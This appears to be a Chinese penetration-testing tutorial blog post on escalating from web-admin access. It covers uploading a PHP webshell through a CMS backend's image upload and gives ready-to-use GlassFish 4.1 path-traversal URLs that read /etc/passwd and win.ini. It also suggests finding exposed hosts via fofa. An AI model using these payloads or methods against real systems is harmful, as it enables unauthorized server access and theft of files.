权限提升-网站权限后台漏洞第三方获取
需要掌握的权限理论
后台权限
- 获得方式:爆破,注入猜解,弱口令等获取的帐号密码配合登录
- 一般网站或应用后台只能操作应用的界面内容数据图片等信息,无法操作程序的源代码或服务器上的资源文件的。(如后台功能存在文件操作的话也可以操作文件数据)
网站权限
- 查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。
- 数据库权限:操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。
接口权限
- 邮件,短信,支付,第三方登录等
某挂壁程序后台权限提升-后台功能
进入后台
源代码搜索文件上传的函数upload
配合业务功能进行抓包测试(在栏目发布这里发现上传图片的地方)
上传图片后抓包
查看源代码是一个数据库的查询语句
查看post的数据包,发现了文件上传的数据包
查看源代码(获取到上传的路径,文件名的更改,这里只改变了文件名,没有改变文件类型,而文件名的命名是以时间来命名的)
找到upload的文件夹,发现了上传的文件
上传php文件,上传成功
业务功能点测试漏洞,发现在模板中心也可以上传文件
总结从后台获取权限的思路
- 如果知道是CMS的程序,可以下载源代码,并且在网上搜已知漏洞(CMS程序的识别:页面的页脚,网站上的CMS识别,关键url,进入管理员后台(有些页脚隐藏了CMS))
- 查看后台的功能,如内容的发布可能会有文件上传漏洞,头像更改,模板管理可以直接上传文件,或者写入代码,后台文件的读取,SQL的执行,网站的备份,敏感文件的读取,组合其它漏洞进行利用(功能越多,成功的几率越大)
GlassFish中间件任意文件读取
fofa搜索GlassFish中间件的ip(GlassFish 4.1版本,注意为windows)
网上搜相关中间件的漏洞
- 构造payload:
http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
- 修改payload访问windows的文件:
http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
最后一次更新于2022-04-21 16:19
0 条评论